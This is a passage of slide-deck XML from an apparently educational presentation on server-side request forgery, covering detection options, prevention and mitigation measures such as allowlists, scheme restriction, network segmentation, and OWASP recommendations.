              <a:t>Due to this attack, Microsoft organised $60,000 USD Azure SSRF Research Challenge inviting security researchers to discover and share high-impact SSRF vulnerabilities in Microsoft Azure.</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00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Detecting SSRF attacks</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Google Shape;261;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="929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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>Native threat detection: Some cloud providers offer threat-detection services as part of their platform. For example, AWS offers AWS GuardDuty.</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Per-host detection: System administrators can deploy host-based intrusion detection systems, or use tools that are already part of the environmental toolchain. For example, a Linux environment includes iptables and auditd.</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a:t>Detection by a web security platform: If a third-party security service is used to block SSRF attempts, then it will typically include reporting as part of the platform.</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61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How to Prevent an SSRF Attack</a:t>
            </a:r>
            <a:endParaRPr sz="1855"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360075" y="100545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Use a whitelist of approved domains and protocols through which remote resources can be acquired by the web server.</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>User input should always be sanitised or validated.</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One must verify that the server response received is as planned to avoid response data leakage to an attacker. The raw response body of the request sent by the server should not be delivered to the client under any circumstances.</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ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1755">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>(1)</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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How to Prevent an SSRF Attack</a:t>
            </a:r>
            <a:endParaRPr sz="1755"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;273;p3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If only HTTP or HTTPS are used by your application to make requests, allow only these URL schemas. If URL schemas like file:///, dict://, ftp:// and gopher:// are disabled, the attacker won’t be able to use the web application to make dangerous requests using these URL schemas.</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Services like Memcached, Redis, Elasticsearch, and MongoDB do not need authentication by default. Server Side Request Forgery vulnerabilities may be used by an attacker to access any of these services without any authentication. Therefore it is best to allow authentication wherever possible, even for services on the local network to ensure security for the web application.						</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1755">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>(2)</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Mitigation of SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Google Shape;279;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1307850"/>
            <a:ext cx="7038900" cy="2952600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-337185" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1710"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1810"/>
              <a:t>Proxies:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t> When an application makes requests on behalf of users, using an external proxy can be a good idea. This does not necessarily have to be a third party but should be an isolated server without access to any internal network resources. Ideally, this should be set up with a cloud provider in a different account then where critical resources live.</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="-337185" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1710"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1810"/>
              <a:t>Offload : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>Certain server-side rendering workflows can be offloaded to third parties. For example, a third-party service might offer PDF rendering of your customer’s data. Similarly, other services may handle images and other dangerous-to-render files for you, reducing the risk of SSRF. This may come with other risks if the data your sending to others is sensitive.</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>(1)</a:t>
            </a:r>
            <a:endParaRPr sz="171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Mitigation of SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1168000"/>
            <a:ext cx="7038900" cy="29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710"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1810"/>
              <a:t>.	Firewalls and Network Segmentation:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1810"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>Stateful firewall rules can drastically reduce the risk associated with SSRF vulnerabilities. Most application servers don’t need the ability to connect to every internal network service. This is especially true in the cloud. Using proper network segmentation and applying the principle of least privilege to outbound connections from application servers can reduce the severity of SSRF vulnerabilities. </a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>4. 	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1810"/>
              <a:t>Validation:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1810"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>Applications that accept URLs by design should do validation to determine that they are valid and will not allow harmful requests. It’s very easy to make mistakes in doing this. If relying solely on this, it’s recommended to validate the checks put in place against current SSRF bypass techniques.</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="171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Mitigation of SSRF</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1307850"/>
            <a:ext cx="7038900" cy="29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810"/>
              <a:t>5. 	Third Party Package Review:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1810"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>Third party packages that are called from applications should be reviewed. For example, if image rendering software accepts JPEG and PNG, and customer files are passed to that, make sure it also does not support features that can introduce SSRF vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1810"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1810"/>
              <a:t>6. 	Using Interactive Application Security Tool:</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>Designed to run in the application server as an agent, they provide real-time detection of security issues by analyzing the traffic and the execution flow of your applications. There is no need to modify the applications, nor conduct specific penetration testing activities.</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>(3)</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>(3)</a:t>
            </a:r>
            <a:endParaRPr sz="171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2021 OWASP TOP 10 Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1118825"/>
            <a:ext cx="7038900" cy="3915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770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>SSRF is included in top 10 list of popular vulnerability under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1410"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>Broken Access Control</a:t>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>Cryptographic Failures</a:t>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>Insecure Design</a:t>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>Vulnerable and Outdated Components</a:t>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>Identification and Authentication Failures</a:t>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>Software and Data Integrity Failures </a:t>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1610"/>
              <a:t>Security Logging and Monitoring Failures</a:t>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1610"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2010">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server-Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2010">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1410"/>
              <a:t>Ⓒ Open Web Application Security Project ® (OWASP)</a:t>
            </a:r>
            <a:endParaRPr sz="1410"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="298" name="Google Shape;298;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5392150" y="1605475"/>
            <a:ext cx="3636175" cy="253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Recommendation by</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> OWASP</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Google Shape;304;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1307850"/>
            <a:ext cx="7038900" cy="2952600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-337185" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1710"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>Do not allow application send requests to resources that are located on internal IP addresses or localhost.</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="-337185" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1710"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>Do not allow application send requests to resources that belong to your infrastructure or your cloud providers.</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="-337185" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1710"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>Do not allow attackers control over file names, if the application works with files.</a:t>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
